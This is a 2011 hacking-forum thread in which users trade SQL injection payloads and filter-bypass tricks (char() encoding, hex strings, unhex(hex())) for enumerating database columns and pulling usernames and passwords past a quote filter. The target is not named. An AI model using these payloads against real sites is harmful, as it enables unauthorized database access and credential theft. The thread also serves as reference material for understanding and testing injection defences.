Follow us on Twitter!
Ideas are far more powerful than guns.
Thursday, April 17, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 27
Guests Online: 24
Members Online: 3

Registered Members: 82818
Newest Member: Ahmed
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

SQLi with character filters - how to


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 15-07-11 21:58
hey guys. how do I proceed with SQLi when seems to be some sort of character filter.

whenever I use ', for example, I get an error. That becomes an issue when I try something like:

UNION ALL SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name='table'--

I've tried using things like table_name=CHR(39)||table||CHR(39) with no success.

Any ideas? :ninja:

Edited by rex_mundi on 11-12-13 13:39
Author

RE: SQLi with character filters - how to?

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 15-07-11 23:15
it's char(12,34,45,56).

not sure if chr() is a valid command. If you run into filters, try to replicate them and test locally.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: SQLi with character filters - how to?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 15-07-11 23:28
http://wocares.com/noquote.php
Author

RE: SQLi with character filters - how to?

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 15-07-11 23:51
http://hackvertor.co.uk



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: SQLi with character filters - how to?


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 16-07-11 01:00
thanks for the tips guys, but still no results.

I tried these inputs:

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(0x27,users,0x27)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)usersCHAR(39)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)||users||CHAR(39)--

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(CHAR(39),users,CHAR(39))--

I've also tried substituting ='users' and 'users' for CHAR(xxx). no cigar.

It is strange that the first one doesn't work, because if I try something like:

union all select null,null,CONCAT(users,0x27,pass),null,null,null,null,null from users--

it works.... so it shouldn't be a problem with CONCAT.

Any more ideas?

Edited by on 16-07-11 01:01
Author

RE: SQLi with character filters - how to?

Tucak
Member

Your avatar

Posts: 19
Location:
Joined: 04.06.08
Rank:
Newbie
Posted on 16-07-11 09:18
It should be something like WHERE table_name=char(1,2,3,4)
Author

RE: unhex(hex())


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-07-11 08:48
Have you tried the unhex(hex()) method - that always seems to work for me.

and its also worth adding a \ character before your single quotes to see if their still using addslashes or something equally pathetic.


Author

RE: SQLi with character filters - how to?

gr00ve_hacker
Member



Posts: 3
Location: Your 127.0.0.1
Joined: 13.01.11
Rank:
Guest
Posted on 28-10-11 17:07
You might want to have a look here :

http://www.youtube.com/watch?v=EWQoAoJix2I


http://gr00ve-hack3r.com

Hacking articles, videos, Downloads and much more
www.gr00ve-hack3r.com